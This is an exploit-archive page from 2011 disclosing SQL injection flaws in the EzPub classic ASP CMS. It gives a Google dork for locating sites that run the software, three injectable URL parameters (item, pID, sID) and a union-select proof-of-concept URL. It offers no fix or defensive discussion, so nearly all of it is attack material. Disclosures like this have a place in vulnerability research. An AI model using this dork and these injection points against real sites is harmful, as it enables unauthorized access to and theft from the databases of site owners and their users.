EzPub Simple Classic ASP CMS SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : EzPub Simple Classic ASP CMS SQL Injection Vulnerability
# Published : 2011-03-08
# Author : p0pc0rn
# Previous Title : Oracle WebLogic Session Fixation Via HTTP POST
# Next Title : Vtiger CRM 5.0.4 Pre-Auth Local File Inclusion Exploit

Title:    EzPub - Simple Classic ASP CMS Vulnerable to SQL Injection
Vendor:   http://www.soft4web.ro
Found by: p0pc0rn 08/03/2011
Dork:     intext:"Powered by EZPub"


SQL - Microsoft JET Database Engine error
------------------------------------------

view_article.asp?item=[SQL]
http://site.com/page.asp?pID=[SQL]
http://site.com/display.asp?sortby=sections&sID=[SQL]

POC
---

http://site.com/view_article.asp?item=1 union select 1 from test.a

thanks,
-p0pc0rn-